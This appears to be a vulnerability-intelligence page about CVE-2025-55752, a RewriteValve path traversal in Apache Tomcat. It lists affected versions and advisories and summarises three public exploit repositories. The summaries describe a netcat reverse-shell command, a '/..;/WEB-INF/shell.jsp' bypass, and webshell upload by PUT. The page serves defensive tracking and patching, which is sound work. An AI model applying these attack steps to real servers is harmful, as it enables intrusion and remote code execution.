Relative Path Traversal in Apache Tomcat RewriteValve
CVE-2025-55752 is a relative path traversal vulnerability in Apache Tomcat affecting URL rewrite handling. A regression introduced by the fix for bug 60013 caused rewritten URLs to be normalized before they were decoded. In configurations using rewrite rules that rewrite query parameters into the URL path, an attacker can manipulate the request URI so that encoded traversal sequences evade intended checks during normalization and are only revealed after decoding. This can bypass Tomcat security constraints, including protections for /WEB-INF/ and /META-INF/. Affected versions are Apache Tomcat 11.0.0-M1 through 11.0.10, 10.1.0-M1 through 10.1.44, and 9.0.0.M11 through 9.0.108. End-of-life 8.5.6 through 8.5.100 are also known affected, and older EOL versions may be affected as well.
Are you exposed to this one?
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
Impact, mitigation & remediation
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
Impact
What an attacker gets, and what they’ve been doing with it.
Mitigation
If you can’t patch tonight, do this now.
Remediation
Patch, then assume compromise.
Exploits
3 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.
Repository is a self-contained PoC environment (Dockerized Tomcat + sample JSP app) and an exploit script for CVE-2025-55752-style Tomcat RewriteValve path traversal leading to arbitrary file write and RCE. Structure/purpose: - app/ (vulnerable demo container) - Dockerfile: builds Tomcat 11.0.10 image, installs netcat, deploys ROOT webapp, enables RewriteValve via server.xml, compiles a benign Filter (meow.ChumyFilter) into WEB-INF/classes. - src/ROOT/index.jsp: simple blog UI that issues PUT requests to /page?p=<id> with HTML body; lists stored blog_*.html files from /bcfa797d7c61df63. - src/ROOT/WEB-INF/rewrite.config: RewriteValve rules. Key rule takes query parameter p and rewrites /page to /bcfa797d7c61df63/blog_%1.html. The regex allows arbitrary characters in p (not excluding '/' or '..'), enabling traversal when URL-encoded. - src/ROOT/WEB-INF/web.xml + classes/meow/ChumyFilter.java: registers a Filter on /*. In the demo it only sets a response header ("Power-By: Chumy"). - src/server.xml: Tomcat config with RewriteValve enabled for the ROOT context. - docker-compose.yml: exposes 8080 and mounts ./flag into container at /f14g1337 (read-only). - exploit.sh: weaponizes the arbitrary file write by compiling a malicious replacement meow.ChumyFilter.class whose init() executes a netcat reverse shell (nc <ip> <port> -e /bin/bash). It then uploads the class via HTTP PUT to /page with p set to an encoded traversal path targeting WEB-INF/classes/meow/ChumyFilter.class (with a trailing ';' likely for bypass). Finally it starts a local nc listener to catch the shell. Exploit capabilities: - Remote arbitrary file write via crafted PUT to /page with traversal in query parameter p. - Remote code execution by overwriting a loaded servlet Filter class file and triggering class initialization, yielding a reverse shell. Notable indicators: - Network endpoint: /page (PUT) is the primary attack surface. - File target: WEB-INF/classes/meow/ChumyFilter.class overwrite. - Reverse shell: outbound TCP to attacker IP:port using netcat and /bin/bash. - Fingerprint header: "Power-By: Chumy" set by the filter in normal operation.
This repository provides a proof-of-concept exploit for CVE-2025-55752, a directory traversal and potential remote code execution vulnerability in Apache Tomcat. The main file, CVE-2025-55752.py, is a Python script that can (1) check if a Tomcat server is vulnerable to path traversal into protected directories (like /WEB-INF/) and (2) attempt to upload a JSP payload via HTTP PUT, then verify if the upload is accessible using a normalization bypass (e.g., /..;/WEB-INF/shell.jsp). The script supports custom payloads and filenames. The README.md gives a detailed explanation of the vulnerability, affected versions, usage instructions, and mitigation recommendations. The requirements.txt lists necessary Python dependencies. The exploit targets Tomcat servers with specific vulnerable versions and configurations, and if successful, can lead to remote code execution by uploading and accessing a web shell in a protected directory.
This repository provides a comprehensive Docker-based environment to reproduce and exploit CVE-2025-55752, a path traversal vulnerability in Apache Tomcat's RewriteValve. The structure includes configuration files for Tomcat, a vulnerable web application, and both Python and Bash scripts for automated exploitation and testing. The main exploit script (docker/scripts/exploit.py) is a Python tool that tests a variety of path traversal payloads against a target Tomcat instance, attempting to read protected files such as /WEB-INF/web.xml and /META-INF/MANIFEST.MF. It also checks if the HTTP PUT method is enabled, which could allow remote code execution by uploading a malicious JSP webshell. The Bash script (docker/scripts/test_vulnerability.sh) automates similar tests using curl. The Tomcat configuration (docker/tomcat/conf/rewrite.config) sets up RewriteValve rules that are essential for triggering the vulnerability. The web application includes protected files and JSP handlers for demonstration and analysis. The exploit is operational: it provides working payloads and can confirm the vulnerability by reading protected files. If the PUT method is enabled, it can escalate to remote code execution. The repository is well-documented, with a README explaining the vulnerability, affected versions, exploitation steps, and mitigation advice. No fake or destructive code is present; the repository is a legitimate and practical exploit environment for CVE-2025-55752.
Affected products & vendors
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
Recent activity
31 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A vulnerability in Apache Tomcat (CVE-2025-55752) used by SAP Commerce Cloud, putting application confidentiality, integrity, and availability at high risk if unpatched.
A directory traversal vulnerability in Apache Tomcat that can lead to remote code execution if the PUT method is enabled, allowing attackers to potentially upload and execute arbitrary files.
A relative path traversal vulnerability in Apache Tomcat's RewriteValve caused by normalization of rewritten URLs before decoding, which can bypass security constraints protecting directories such as /WEB-INF/ and /META-INF/. In certain configurations with HTTP PUT enabled, it may allow malicious file upload and potentially remote code execution.
A relative path traversal flaw in Apache Tomcat that can bypass protected paths (e.g., /WEB-INF/, /META-INF/) and, if PUT is enabled, may enable malicious file upload leading to potential RCE.
The version that knows your environment.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.